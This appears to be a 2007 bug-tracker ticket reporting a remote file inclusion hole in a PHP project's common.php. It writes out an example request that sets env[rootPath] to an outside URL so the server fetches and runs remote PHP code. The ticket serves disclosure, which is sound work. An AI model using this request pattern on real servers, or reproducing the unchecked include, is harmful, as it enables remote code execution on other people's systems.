#30 Security problem with include $env['rootPath']...

v2.0
open
nobody
5
2007-07-16
2007-07-16
Anonymous
No

Spammers and crackers seem to really like this line in common.php:
include_once( $env['rootPath'].'/include/adodb/adodb.inc.php' );

When they call the script like e.g.:
......./include/common.php?env[rootPath]=http://server.net/script.txt?

They can execute all sorts of PHP code inside your server installation !

- This assumes, of course, that register_globals and allow_url_fopen are both on...

Discussion